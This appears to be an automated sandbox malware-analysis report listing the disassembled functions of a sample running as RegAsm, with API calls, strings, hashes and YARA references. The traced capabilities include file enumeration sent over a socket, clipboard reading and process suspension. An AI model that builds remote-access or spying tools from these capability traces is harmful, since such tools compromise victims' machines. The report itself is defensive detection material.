                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                          • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                          Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                          • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                                          • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                          • String ID: sJD
                                                          • API String ID: 4212172061-3536923933
                                                          • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                          • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                          Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                          • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                          • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                          • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                          Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040966A
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                          • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                          • Opcode Fuzzy Hash: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                          • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                          Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408811
                                                          • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                          • String ID:
                                                          • API String ID: 1771804793-0
                                                          • Opcode ID: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                                                          • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                          • Opcode Fuzzy Hash: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                                                          • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                          Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: XPG$XPG
                                                          • API String ID: 4113138495-1962359302
                                                          • Opcode ID: 8ec9f0cc365a37df7811e5b4f0ae14501dc80df39e96773c8ea2da6c59a756f9
                                                          • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                          • Opcode Fuzzy Hash: 8ec9f0cc365a37df7811e5b4f0ae14501dc80df39e96773c8ea2da6c59a756f9
                                                          • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                          Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                            • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                            • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                            • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                          • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                          Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                          • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                          Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                          • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                          Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                          Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00F6E048), ref: 00433849
                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                          Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                          • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                          • ExitProcess.KERNEL32 ref: 004432EF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                          • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                          Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                          Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 0040B711
                                                          • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                          • CloseClipboard.USER32 ref: 0040B725
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseDataOpen
                                                          • String ID:
                                                          • API String ID: 2058664381-0
                                                          • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                          • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                          Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                          • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenSuspend
                                                          • String ID:
                                                          • API String ID: 1999457699-0
                                                          • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                          • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                          Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                          • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenResume
                                                          • String ID:
                                                          • API String ID: 3614150671-0
                                                          • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                          • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                                          Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID: MZ@
                                                          • API String ID: 2325560087-2978689999
                                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                          Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                          • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                          Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
